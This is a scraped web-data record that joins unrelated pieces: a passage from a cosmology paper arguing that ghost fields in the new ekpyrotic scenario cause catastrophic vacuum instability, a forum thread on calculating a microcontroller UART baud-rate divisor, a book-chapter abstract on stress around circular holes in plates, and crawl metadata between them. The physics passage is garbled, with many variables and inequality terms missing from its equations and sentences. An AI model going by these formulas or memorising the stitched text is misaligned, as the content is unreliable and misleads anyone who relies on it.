), and then the dynamics reduces to one with no higher derivative corrections.\n\nThe closed equations of motion for coupled to gravity are obtained by expanding (55) and linearizing with respect to and . Then we get\n\n ¨π+3H˙π+m4M4(¨Y+3H˙Y)=−V,ϕm4/M4 ,\n ¨π+3H˙π=M′2Y+3Hm2 , (56)\n ˙H=M4˙π2m2+˙Ym2 .\n\n## 6 On reality of the bounce and reality of ghosts\n\nUsing the equations derived above, we performed an analytical and numerical investigation of the possibility of the bounce in the new ekpyrotic scenario. We will not present all of the details of this investigation here since it contains a lot of material which may distract the reader from the main conclusion of our paper, discussed in the next section: Because of the existence of the ghosts, this theory suffers from a catastrophic vacuum instability. If this is correct, any analysis of classical dynamics has very limited significance. However, we will briefly discuss our main findings here, just to compare them with the expectations expressed in [12, 13, 14, 15].\n\nOur investigation was based on the particular scenario discussed in [13, 15] because no explicit form of the full ekpyrotic potential was presented in [12, 14]. The authors of [13, 15] presented the full ekpyrotic potential, but they did not fully verify the validity of their scenario, even in the absence of the higher derivative terms.\n\nBefore discussing our results taking into account higher derivatives, let us remember several constraints on the model parameters which were derived in [12, 13, 14, 15]. We will represent these constraints in terms of the ghost condensate mass instead of the parameter , for . In this case the stability condition (7.19) in (see also [12, 14]) reads:\n\n |˙H||H|≲M4mg≲|H| . (57)\n\nIt was assumed in that the bounce should occur very quickly, during the time . Here is the Hubble constant at the end of the ekpyrotic state, just before it start decreasing during the bounce, , and is the value of the ekpyrotic potential in its minimum. During the bounce one can estimate because we assume, following , that , and we assume an approximately linear change of from to . This means that . In this case the previous inequalities become quite restrictive,\n\n |H0|≲M4mg≲|H0| . (58)\n\nThis set of inequalities requires that the stable bounce is not generic; it can occur only for a fine-tuned value of the ghost mass,\n\n mg∼M4|H0|∼M4√p|Vmin| . (59)\n\nThe method of derivation of these conditions required an additional condition to be satisfied, , see Eqs. (8.8) and (8.17) of Ref. . This condition is satisfied for\n\n mg≫M2 . (60)\n\nWhereas the condition (59) seems necessary in order to avoid the development of the gravitational instability and the gradient instability during the bounce for , it is not sufficient, simply because the very existence of the bounce may require to be very much different from its fine-tuned value .", null, "Figure 1: The “new ekpyrotic potential,” see Fig. 3 in and Fig. 6 in . The cosmological evolution in this model results in a universe with a permanently growing rate of expansion after the bounce, which is unacceptable.\n\nIndeed, our investigation of the cosmological evolution in this model shows that generically the bounce does not appear at all, or one encounters a singular behavior of because of the vanishing of the term in (55), or one finds an unstable bounce, or the bounce ends up with an unlimited growth of the Hubble constant, like in the Big Rip scenario . Finding a proper potential leading to a desirable cosmological evolution requires a lot of fine-tuning, in addition to the fine-tuning already described in [13, 15].\n\nFor example, the bounce in the model with the “new ekpyrotic potential” described in [13, 15] and shown in Fig. 1 results in a universe with a permanently growing rate of expansion after the bounce, which would be absolutely different from our universe. To avoid this disaster, one must bend the potential, to make it approaching the value corresponding to the present value of the cosmological constant, see Fig. 2. This bending should not be too sharp, and it should not begin too early, since otherwise the universe bounces back and ends up in the singularity. Fig. 3 shows the bouncing solution in the theory with this potential.", null, "Figure 2: An improved potential which leads to a bounce followed by a normal cosmological evolution. We do not know whether this extremely fine-tuned potential can be derived from any realistic theory.", null, "Figure 3: The behavior of the Hubble constant H(t) near the bounce, which occurs near t=18. To verify the stability of the universe during the bounce, one would need to perform an additional investigation taking into account the ghost field oscillations shown in Fig. 4.", null, "Figure 4: Ekpyrotic ghost field oscillations.\n\nOur calculations clearly demonstrate the reality of the ekpyrotic ghosts, see Fig. 4, which shows the behavior of the ghost-related field near the bounce. The oscillations shown in Fig. 4 represent the ghost matter with negative energy, which was generated during the ekpyrotic collapse. We started with initial conditions , i.e. in the vacuum without ghosts, and yet the ghost-related field emerged dynamically. It oscillates with the frequency which is much higher than the rate of the change of the average value of the field .\n\nThis shows that the ekpyrotic ghost is not just a mathematical construct or a figment of imagination, but a real field. We have found that the amplitude of the oscillations of the ghost field is very sensitive to the choice of initial conditions; it may be negligibly small or very large. Therefore in the investigation of the cosmological dynamics one should not simply consider the universe filled with scalar fields or scalar particles. The universe generically will contain normal particles and ghost particles and fields with negative energy. The ghost particles will interact with normal particles in a very unusual way: particles and ghosts will run after each other with ever growing speed. This regime is possible because when the normal particles gain energy, the ghosts loose energy, so the acceleration regime is consistent with energy conservation. This unusual instability, which is very similar to the process to be considered in the next section, can make it especially difficult to solve the homogeneity problem in this scenario.\n\n## 7 Ghosts, singularity and vacuum instability\n\nIt was not the goal of the previous section to prove that the ghosts do not allow one to solve the singularity problem. They may or may not spoil the bounce in the new ekpyrotic scenario. However, in general, if one is allowed to introduce ghosts, then the solution of the singularity problem becomes nearly trivial, and it does not require the ekpyrotic scenario or the ghost condensate.\n\nIndeed, let us consider a simple model describing a flat collapsing universe which contains a dust of heavy non-relativistic particles with initial energy density , and a gas of ultra-relativistic ghosts with initial energy density . Suppose that at the initial moment , when the scale factor of the universe was equal to , the energy density was dominated by energy density of normal particles, . The absolute value of the ghost energy density in the collapsing universe grows faster than the energy of the non-relativistic matter. The Friedmann equation describing a collapsing universe is\n\n H2=(˙aa)2=ρMa3−ρga4 . (61)\n\nIn the beginning of the cosmological evolution, the universe is collapsing, but when the scale factor shrinks to , the Hubble constant vanishes, and the universe bounces back, thus avoiding the singularity.\n\nThus nothing can be easier than solving the singularity problem once we invoke ghosts to help us in this endeavor, unless we are worried about the gravitational instability problem mentioned in the previous section. Other examples of the situations when ghosts save us from the singularity can be found, e.g. in , where the authors not only study a way to avoid the singularity with the help of ghosts, but even investigate the evolution of metric perturbations during the bounce. So what can be wrong with it?\n\nA long time ago, an obvious answer would be that theories with ghosts lead to negative probabilities, violate unitarity and therefore do not make any sense whatsoever. Later on, it was realized that if one treats ghosts as particles with negative energy, then problems with unitarity are replaced by the problem of vacuum stability due to interactions between ghosts and normal particles with positive energy, see, e.g. [29, 30, 31, 32, 33, 34, 35]. Indeed, unless the ghosts are hidden in another universe , nothing can forbid creation of pairs of ghosts and normal particles under the condition that their total momentum and energy vanish. Since the total energy of ghosts is negative, this condition is easy to satisfy.", null, "Figure 5: Vacuum decay with production of ghosts ξ and usual particles γ interacting with each other by the graviton exchange.\n\nThere are many channels of vacuum decay; the simplest and absolutely unavoidable one is due to the universal gravitational interaction between ghosts and all other particles, e.g. photons. An example of this interaction was considered in , see Fig. 5. Nothing can forbid this process because it does not require any energy input: the positive energy of normal particles can be compensated by the negative energy of ghosts.\n\nAn investigation of the rate of the vacuum decay in this process leads to a double-divergent result. First of all, there is a power-law divergence because nothing forbids creation of particles with indefinitely large energy. In addition, there is also a quadratic divergence in the integral over velocity [32, 34]. This leads to a catastrophic vacuum decay.\n\nOf course, one can always argue that such processes are impossible or suppressed because of some kind of cutoff in momentum space, or further corrections, or non-local interactions. However, the necessity of introducing such a cut-off, or additional corrections to corrections, after introducing the higher derivative terms which were supposed to work as a cutoff in the first place, adds a lot to the already very high price of proposing an alternative to inflation: First it was the ekpyrotic theory, then the ghost condensate and curvatons, and finally - ekpyrotic ghosts with negative energy which lead to a catastrophic vacuum instability. And if we are ready to introduce an ultraviolet cutoff in momentum space, which corresponds to a small-scale cutoff in space-time, then why would we even worry about the singularity problem, which is supposed to occur on an infinitesimally small space-time scale?\n\nIn fact, this problem was already emphasized by the authors of the new ekpyrotic scenario, who wrote :\n\n“But ghosts have disastrous consequences for the viability of the theory. In order to regulate the rate of vacuum decay one must invoke explicit Lorentz breaking at some low scale . In any case there is no sense in which a theory with ghosts can be thought as an effective theory, since the ghost instability is present all the way to the UV cut-off of the theory.”\n\nWe have nothing to add to this characterization of their own model.\n\nAcknowledgments: It is a pleasure to thank B. Craps, P. Creminelli, G. Horowitz, N. Kaloper, J. Khoury, S. Mukohyama, L. Senatore, V. Vanchurin, A. Vikman and S. Winitzki for useful discussions. The work by R.K. and A.L. was supported in part by NSF grant PHY-0244728 and by the Alexander-von-Humboldt Foundation. The work by J.U.K. was supported by the German Academic Exchange Service.\n\n## 8 Appendix. Exorcising ghosts?\n\nAfter this paper was submitted, one of the authors of the new ekpyrotic scenario argued that, according to , ghosts can be removed by field redefinitions and adding other degrees of freedom in the effective UV theory . Let us reproduce this argument and explain why it does not apply to the ghost condensate theory and to the new ekpyrotic scenario.\n\nRefs. [36, 37] considered a normal massless scalar field with Lagrangian density in signature.333In our paper we used the signature , so some care should be taken when comparing the equations. Note that this does not change the sign of the higher derivative term ; the ghost condensate/ekpyrotic theory corresponds to .\n\n L=−12(∂ϕ)2+a2m2g(□ϕ)2−Vint(ϕ), (62)\n\nwhere , and is a self-interaction term. This theory is similar to the ghost condensate/new ekpyrotic theory in the case , , see eqs. (1) and (24). The sign of is crucially important: the term would not protect this theory against the gradient instability in the region with the NEC violation.\n\nNote that in notation of [36, 37], , which could suggest that the ghost mass is a UV cut-off, and therefore there are no dangerous excitations with energies and momenta higher than . However, this interpretation of the theory (62) would be misleading. Upon a correct quantization, this theory can be represented as a theory of two fields without the higher derivative non-renormalizable term , see Eq. (42). One can introduce the UV cut-off when regularizing Feynman diagrams in this theory, but there is absolutely no reason to identify it with ; in fact, the UV cut-off which appears in the regularization procedure is supposed to be arbitrarily large, so the perturbations with frequencies greater than should not be forbidden.\n\nMoreover, as we already explained in Section 2, one cannot take the higher derivative term into account only up to some cut-off . If, for example, we “turn on” this term only at , it is not going to protect us from the gradient instability, which occurs at for all indefinitely large in the region where the NEC is violated and . Note that this instability grows stronger for greater values of momenta . Therefore if one wants to prove that the new ekpyrotic scenario does not lead to instabilities, one must verify it for all values of momenta. Checking it for is insufficient. Our results imply that if one investigates this model exactly in the way it is written now (i.e. with the term ), it does suffer from vacuum instability, and if we discard the higher derivative term at momenta greater that some cut-off, the instability becomes even worse. Is there any other way to save the new ekpyrotic scenario?\n\nOne could argue [36, 37] that the term is just the first term in a sum of many higher derivative terms in an effective theory, which can be obtained by integration of high energy degrees of freedom of some extended physically consistent theory. In other words, one may conjecture that the theory can be made UV complete, and after that the problem with ghosts disappears. However, not every theory with higher derivatives can be UV completed. In particular, the possibility to do it may depend on the sign of the higher derivative term .\n\nAccording to , the theory (62) is plagued by ghosts independently of the sign of the higher derivative term in the Lagrangian. One can show it by introducing an auxiliary scalar field and a new Lagrangian\n\n L′=−12(∂ϕ)2−a∂μχ∂μϕ−12am2gχ2−Vint(ϕ), (63)\n\nwhich reduces exactly to once is integrated out. is diagonalized by the substitution :\n\n L′=−12(∂ϕ′)2+12(∂χ)2−12am2gχ2−Vint(ϕ′,χ), (64)\n\nwhich clearly signals the presence of a ghost: has a wrong-sign kinetic term.\n\nThen the authors of identified as a tachyon for , suggesting that in this case has exponentially growing modes. However, this is not the case: due to the opposite sign of the kinetic term for the -field, the tachyon is at , not at . Indeed, because of the flip of the sign of the kinetic term for the field , its equation of motion has a solution with\n\n −(ω2−→k2)=am2g . (65)\n\nFor the field with the normal sign of the kinetic term, the negative mass squared would mean exponentially growing modes. But the flip of the sign of the kinetic term performed together with the flip of the sign of the mass term does not lead to exponentially growing modes [29, 30]. Based on the misidentification of the negative mass of the field with the wrong kinetic terms as a tachyon, the authors choose to continue with the case in eq. (62). Starting from this point, their arguments are no longer related to the ghost condensate theory and the new ekpyrotic theory, where . We will return to the case shortly.\n\nFor the case they argued that the situation is not as bad as it could seem. They proposed to use the scalar field theory eq. (62) at energies below , and postulated that some new degree of freedom enters at and takes care of the ghost instability. The authors describe this effect by adding a term to construct the high energy Lagrangian. For they postulate\n\n La=1UV≡L′−(∂χ)2=−12(∂ϕ)2−∂μχ∂μϕ−(∂χ)2−12m2gχ2 (66)\n\nand use the shift to get a simple form of a UV theory. This trick reverses the sign of the kinetic term of the field , and the ghost magically converts into a perfectly healthy scalar with mass :\n\n La=1UV=−12(∂~ϕ)2−12(∂χ)2−12m2gχ2. (67)\n\nOne may question validity of this procedure, but let us try to justify it by looking at the final result. Consider equations of motion for from eq. (66) and solve them by iteration in the approximation when :\n\n χ=□ϕm2g+2□χm2g≈□ϕm2g+2□2ϕm4g+... (68)\n\nNow replace in eq. (66) by its expression in terms of as given in eq. (68). The result is our original Lagrangian (62), plus some additional higher derivative terms, which are small at , i.e. at . Thus one may conclude that, for , the theory (62), which has tachyonic ghosts, may be interpreted as a low energy approximation of the UV consistent theory (67).\n\nNow let us return to the ghost condensate/new ekpyrotic case. To avoid gradient instabilities in the ekpyrotic scenario, the sign of the higher derivative term in eq. (62) has to be negative, , see eq. (1" ]
[ null, "https://media.arxiv-vanity.com/render-output/4810345/x1.png", null, "https://media.arxiv-vanity.com/render-output/4810345/x2.png", null, "https://media.arxiv-vanity.com/render-output/4810345/x3.png", null, "https://media.arxiv-vanity.com/render-output/4810345/x4.png", null, "https://media.arxiv-vanity.com/render-output/4810345/x5.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9368835,"math_prob":0.97022355,"size":40956,"snap":"2021-21-2021-25","text_gpt3_token_len":8839,"char_repetition_ratio":0.16846552,"word_repetition_ratio":0.04131868,"special_character_ratio":0.21359508,"punctuation_ratio":0.10770647,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9813873,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-21T04:26:13Z\",\"WARC-Record-ID\":\"<urn:uuid:c12fd7ad-04bb-4277-9b17-c67de0cd4d99>\",\"Content-Length\":\"1049524\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:180d3eba-ec32-44b4-862b-743c48fa916e>\",\"WARC-Concurrent-To\":\"<urn:uuid:9b08566c-54b4-4fe2-ab00-8616b771cbac>\",\"WARC-IP-Address\":\"104.21.14.110\",\"WARC-Target-URI\":\"https://www.arxiv-vanity.com/papers/0712.2040/\",\"WARC-Payload-Digest\":\"sha1:H2M2TJFYB4DWIFQIUPTUDYEJ7QNBLRM7\",\"WARC-Block-Digest\":\"sha1:VNW4BRJ3RZHPKCA5EC7RN2XYSGMLPCZZ\",\"WARC-Truncated\":\"length\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623488262046.80_warc_CC-MAIN-20210621025359-20210621055359-00166.warc.gz\"}"}
https://embdev.net/topic/129903
[ "# Forum: ARM programming with GCC/GNU tools Clock/Baudrate\n\nRate this post\n 0 ▲ useful ▼ not useful\nHi\nmy problem is that i dont understand the calculation of CD\n\n19200 Baud, 8 Bit, 1 Stopbit, no parity and asynchronous\nCPU clocked with 10 mhz\n\nthis is the circuit im talking about\nhttp://img187.imageshack.us/img187/2028/mckitr8.jpg\n\nCD= MCKI / (16 * Baud Rate) = 10* 10^6 Hz / (16 * 192Baud) = 8,13 => 8\nCD= MCKI / (16 * Baud Rate) = (10* 10^6 Hz / 8) / (16 * 192Baud) = 1,017\n=> 1\n\nthis an example calculation given by the professor.\nand now if i enter 10* 10^6 Hz / (16 * 19200) in my calculator it gives\nme 32,55\nwhich is like 4 times the value of the professor.\nnow there must be some sort of \"divisionfactor\", which is supposably 4\nin this case, but how do i calculate this \"divisionfactor\"?\nor is it always the same?\n\nand what is meant by 192baud is this the same as 19200 Baud? if not how\ndoes it differ?\nwell thanks in advance\n\nRate this post\n 0 ▲ useful ▼ not useful\nHorst Dieter wrote:\n> CD= MCKI / (16 * Baud Rate) = 10* 10^6 Hz / (16 * 192Baud) = 8,13 => 8\n> CD= MCKI / (16 * Baud Rate) = (10* 10^6 Hz / 8) / (16 * 192Baud) = 1,017\n> => 1\n\nFrom that and the diagram I have to agree with you rather than your\nprofessor, however there are some ambiguities:\n\nWhere does the divide by eight the second example come from? It is not\nindicated in the illustration you posted. Which one of those are you\nactually using?\n\nYou said the CPU is clocked at 10MHz, but the example indicates an MCKI\nof 100MHz. Is 10MHz rather he crystal frequency and 10 the clock\nmultiplier? 10MHz is rather low for an ARM part.\n\nNote that the USART is a vendor defined peripheral component and not a\nstandard ARM core component, it would be useful if you could specify the\npart so we could simply take a look at the data sheet or user manual and\nget a definitive answer. (or you could do that).\n\nHorst Dieter wrote:\n> and what is meant by 192baud is this the same as 19200 Baud? if not how\n> does it differ?\nIt seems we are both confused by that. As I said refer to the data sheet\nfor the part, or let us know what the part is. If Baud merely refers to\nthe units (as in Hz earlier in the equation), 192 is a rather odd and\nvery low rate (and does not match the answer given), shouldn't that be\n\"19200 Baud\" I wonder? It still does not make much sense however.\n\nDon't assume that your prof is correct, it would not be the first time\ninaccurate information was provided (especially if this is the forst\npresentation of the material). That said be diplomatic and discrete is\npointing out any error - your marks may depend upon it! ;-)\n\nClifford\n\nRate this post\n 0 ▲ useful ▼ not useful\nClifford Slocombe wrote:\n> Where does the divide by eight the second example come from?\nOk, I am blind, it see now that is an alternative USCKLS input.\n\nClifford Slocombe wrote:\n> it would be useful if you could specify the part\n\nOk, with a bit of lateral thinking, Google'ing MCKI, and comparing the\ndata sheet diagram with your diagram, I have determined that you are\nprobably using an Atmel AT91 device. But which one?\n\nClifford\n\nRate this post\n 0 ▲ useful ▼ not useful\nClifford Slocombe wrote:\n> You said the CPU is clocked at 10MHz, but the\n> example indicates an MCKI of 100MHz.\n\nI am being very foggy brained - that's what a month of not working does\nto you! Of course 10*10^6 is 10MHz, not 100MHz.\n\nI agree with your calculation, your prof is either wrong or you have\ntranscribed the information incorrectly.\n\n• $formula (LaTeX syntax)$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9416728,"math_prob":0.87451273,"size":1641,"snap":"2020-34-2020-40","text_gpt3_token_len":456,"char_repetition_ratio":0.092241906,"word_repetition_ratio":0.0375,"special_character_ratio":0.2839732,"punctuation_ratio":0.08656716,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9794727,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-28T16:00:12Z\",\"WARC-Record-ID\":\"<urn:uuid:92f4412d-00be-4eba-86fe-7a63746d7170>\",\"Content-Length\":\"37451\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:47a162fa-eb29-493e-b5c2-a0893800f6cc>\",\"WARC-Concurrent-To\":\"<urn:uuid:21fae2f8-334a-4fa7-96f2-f47849343cde>\",\"WARC-IP-Address\":\"78.46.249.179\",\"WARC-Target-URI\":\"https://embdev.net/topic/129903\",\"WARC-Payload-Digest\":\"sha1:NFLSAS43GT64YJM5UFW6PWO4B7HTT5QN\",\"WARC-Block-Digest\":\"sha1:AF2B6TRHJ2BZ46GHMYVSGIH2AYDPGOTQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401601278.97_warc_CC-MAIN-20200928135709-20200928165709-00761.warc.gz\"}"}
https://www.percentagecal.com/answer/what-is-percentage-difference-from-218-to-201
[ "What is the percentage increase/decrease\n\n#### Solution for What is the percentage increase/decrease from 218 to 201:\n\n(201-218):218*100 =\n\n(201:218-1)*100 =\n\n92.201834862385-100 = -7.8\n\nNow we have: What is the percentage increase/decrease from 218 to 201 = -7.8\n\nWhat is the percentage increase/decrease\n\n#### Solution for What is the percentage increase/decrease from 201 to 218:\n\n(218-201):201*100 =\n\n(218:201-1)*100 =\n\n108.45771144279-100 = 8.46\n\nNow we have: What is the percentage increase/decrease from 201 to 218 = 8.46\n\nCalculation Samples" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88852596,"math_prob":0.8670928,"size":1048,"snap":"2023-40-2023-50","text_gpt3_token_len":331,"char_repetition_ratio":0.27586207,"word_repetition_ratio":0.3,"special_character_ratio":0.4341603,"punctuation_ratio":0.124423966,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99880224,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-01T12:46:58Z\",\"WARC-Record-ID\":\"<urn:uuid:b1a93ca9-eed8-4885-96e9-74bf0e710d19>\",\"Content-Length\":\"10406\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6f964d40-1fa1-4635-b652-c62fa14b5314>\",\"WARC-Concurrent-To\":\"<urn:uuid:a61a3c45-4819-487f-a1fe-1d11d60ce5dd>\",\"WARC-IP-Address\":\"217.23.5.136\",\"WARC-Target-URI\":\"https://www.percentagecal.com/answer/what-is-percentage-difference-from-218-to-201\",\"WARC-Payload-Digest\":\"sha1:EOTQF3TNZZNGCQKFYVMEZNFPLZ5BEDYC\",\"WARC-Block-Digest\":\"sha1:2XVGBLXG77H5CPRNG46NLXIIR4MG7ZHM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510888.64_warc_CC-MAIN-20231001105617-20231001135617-00531.warc.gz\"}"}
https://zims-en.kiwix.campusafrica.gos.orange.com/wikipedia_en_all_nopic/A/Additive_inverse
[ "In mathematics, the additive inverse of a number a is the number that, when added to a, yields zero. This number is also known as the opposite (number), sign change, and negation. For a real number, it reverses its sign: the opposite to a positive number is negative, and the opposite to a negative number is positive. Zero is the additive inverse of itself.\n\nThe additive inverse of a is denoted by unary minus: −a (see the discussion below). For example, the additive inverse of 7 is −7, because 7 + (−7) = 0, and the additive inverse of −0.3 is 0.3, because −0.3 + 0.3 = 0 .\n\nThe additive inverse is defined as its inverse element under the binary operation of addition (see the discussion below), which allows a broad generalization to mathematical objects other than numbers. As for any inverse operation, double additive inverse has no net effect: −(−x) = x.\n\n## Common examples\n\nFor a number and, generally, in any ring, the additive inverse can be calculated using multiplication by −1; that is, n = 1 × n . Examples of rings of numbers are integers, rational numbers, real numbers, and complex numbers.\n\n### Relation to subtraction\n\nAdditive inverse is closely related to subtraction, which can be viewed as an addition of the opposite:\n\nab  =  a + (−b).\n\nConversely, additive inverse can be thought of as subtraction from zero:\n\na  =  0 − a.\n\nHence, unary minus sign notation can be seen as a shorthand for subtraction with \"0\" symbol omitted, although in a correct typography there should be no space after unary \"−\".\n\n### Other properties\n\nIn addition to the identities listed above, negation has the following algebraic properties:\n\n• −(−a) = a, it is an Involution operation\n• −(a + b) = (−a) + (−b)\n• a − (−b) = a + b\n• (−a) × b = a × (−b) = −(a × b)\n• (−a) × (−b) = a × b\nnotably, (−a)2 = a2\n\n## Formal definition\n\nThe notation + is usually reserved for commutative binary operations; i.e., such that x + y = y + x, for all x, y. If such an operation admits an identity element o (such that x + o ( = o + x ) = x for all x), then this element is unique ( o = o + o = o ). For a given x , if there exists x such that x + x ( = x + x ) = o , then x is called an additive inverse of x.\n\nIf + is associative (( x + y ) + z = x + ( y + z ) for all x, y, z), then an additive inverse is unique. To see this, let x and x″ each be additive inverses of x; then\n\nx = x + o = x + (x + x″) = (x + x) + x″ = o + x″ = x″.\n\nFor example, since addition of real numbers is associative, each real number has a unique additive inverse.\n\n## Other examples\n\nAll the following examples are in fact abelian groups:\n\n• complex numbers: −(a + bi)  =  (−a) + (−b)i. On the complex plane, this operation rotates a complex number 180 degrees around the origin (see the image above).\n• addition of real- and complex-valued functions: here, the additive inverse of a function f is the function −f defined by (−f )(x) = − f (x) , for all x, such that f + (−f ) = o , the zero function ( o(x) = 0 for all x ).\n• more generally, what precedes applies to all functions with values in an abelian group ('zero' meaning then the identity element of this group):\n• sequences, matrices and nets are also special kinds of functions.\n• In a vector space the additive inverse v is often called the opposite vector of v; it has the same magnitude as the original and opposite direction. Additive inversion corresponds to scalar multiplication by −1. For Euclidean space, it is point reflection in the origin. Vectors in exactly opposite directions (multiplied to negative numbers) are sometimes referred to as antiparallel.\n• In modular arithmetic, the modular additive inverse of x is also defined: it is the number a such that a + x ≡ 0 (mod n). This additive inverse always exists. For example, the inverse of 3 modulo 11 is 8 because it is the solution to 3 + x ≡ 0 (mod 11).\n\n## Non-examples\n\nNatural numbers, cardinal numbers, and ordinal numbers, do not have additive inverses within their respective sets. Thus, for example, we can say that natural numbers do have additive inverses, but because these additive inverses are not themselves natural numbers, the set of natural numbers is not closed under taking additive inverses." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8916729,"math_prob":0.99841136,"size":4769,"snap":"2021-04-2021-17","text_gpt3_token_len":1242,"char_repetition_ratio":0.18069255,"word_repetition_ratio":0.007829977,"special_character_ratio":0.28056195,"punctuation_ratio":0.1395856,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99984634,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-18T07:14:03Z\",\"WARC-Record-ID\":\"<urn:uuid:6a984fd2-abee-436f-9518-75ea047453a0>\",\"Content-Length\":\"22948\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f3035615-302d-410d-9d22-de4115079514>\",\"WARC-Concurrent-To\":\"<urn:uuid:7d5828bf-72ea-4bcf-a672-330b523445f1>\",\"WARC-IP-Address\":\"41.66.34.68\",\"WARC-Target-URI\":\"https://zims-en.kiwix.campusafrica.gos.orange.com/wikipedia_en_all_nopic/A/Additive_inverse\",\"WARC-Payload-Digest\":\"sha1:YYQXOGGYYYKTTTSMXVRR7SMMQNR2RS4D\",\"WARC-Block-Digest\":\"sha1:AX2LLIP7AV73VWVTWXFRJW3TYOZR6JOM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703514423.60_warc_CC-MAIN-20210118061434-20210118091434-00548.warc.gz\"}"}
http://primalvape.co/city-of-ember-worksheets/the-city-of-ember-chapters-3-and-4-lesson-plan-worksheets-book-worksheet/
[ "# The City Of Ember Chapters 3 And 4 Lesson Plan Worksheets Book Worksheet", null, "the city of ember chapters 3 and 4 lesson plan worksheets book worksheet.\n\ncity of ember book worksheet the novel unit teacher guide free worksheets instructions,city of ember free worksheets the novel study unit with questions and activities movie,the city of ember reed novel studies by instructions worksheet book movie worksheets,the city of ember worksheet answers free worksheets instructions novel study unit with questions and activities,city of ember instructions worksheet movie worksheets the answers teaching resources,the city of ember introduction and chapter 1 lesson plan for worksheet answers book movie worksheets,the city of ember worksheet answers worksheets novel study teachers pay instructions,city of ember r h instructions worksheet the answers book,city of ember book worksheet free worksheets the answers 4 features,city of ember worksheets the worksheet answers movie teacher resources mom on move." ]
[ null, "http://primalvape.co/wp-content/uploads/2019/10/the-city-of-ember-chapters-3-and-4-lesson-plan-worksheets-book-worksheet.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86238754,"math_prob":0.57376975,"size":925,"snap":"2019-51-2020-05","text_gpt3_token_len":154,"char_repetition_ratio":0.2703583,"word_repetition_ratio":0.093023255,"special_character_ratio":0.15891892,"punctuation_ratio":0.07189543,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95187616,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-09T19:09:04Z\",\"WARC-Record-ID\":\"<urn:uuid:d351353a-c54b-423a-b36e-1dc04894c72d>\",\"Content-Length\":\"41406\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e8e12e00-6661-4ee3-bf04-494a40e2f1ac>\",\"WARC-Concurrent-To\":\"<urn:uuid:d58b6b0c-4385-43a3-94a3-66271087774b>\",\"WARC-IP-Address\":\"104.31.67.196\",\"WARC-Target-URI\":\"http://primalvape.co/city-of-ember-worksheets/the-city-of-ember-chapters-3-and-4-lesson-plan-worksheets-book-worksheet/\",\"WARC-Payload-Digest\":\"sha1:MDHOMHZPONGGZG2G4TQ3FYKK7B65Z3SF\",\"WARC-Block-Digest\":\"sha1:BCMLTBCAPXQXG3RSQDQCIRDOBMDGYULP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540521378.25_warc_CC-MAIN-20191209173528-20191209201528-00189.warc.gz\"}"}
https://bookpublisherint.wordpress.com/2019/09/27/effect-of-the-type-of-load-at-infinity-over-circular-discontinuity-in-elastic-regime-a-theoretical-review-chapter-06-current-research-in-science-and-technology-vol-1/
[ "# Effect of the Type of Load at Infinity over Circular Discontinuity in Elastic Regime: A Theoretical Review | Chapter 06 | Current Research in Science and Technology Vol. 1\n\nA comprehensive review on the methodology to obtain two dimensional stress field around a discontinuity in the form of a circular hole in the plate subjected to various types of, uniform, axisymmetric and non-axisymmetric monotonic loads at infinity viz. uni-axial tensile, equal bi-axial (tensile-tensile and tensile-compressive) and pure shear is presented with the help of the basic principles of elasticity. The material of the plate is considered to be homogenous, isotropic and linear elastic. Effect of the difference in the type of far field load over the nature and the magnitude of stress fields is examined. Fundamental bi-harmonic equation involving Airy’s stress function is used. The stress function, determined by assuming it in the form of trigonometric series and by employing suitable mathematical substitutions, is made to satisfy the bi-harmonic equation. Constants of the stress function are found from the boundary conditions. Stress concentrations at the surface of the hole and at locations away from the hole are obtained for all the investigated load cases. Stress solutions in cases of bi-axial loads of un-identical magnitudes are also presented.\n\nAuthor(s) Details\n\nDr. Sunil Bhat\nDepartment of Mechanical Engineering, SET, Jain University, Bangalore, Karnataka, India." ]
[ null ]
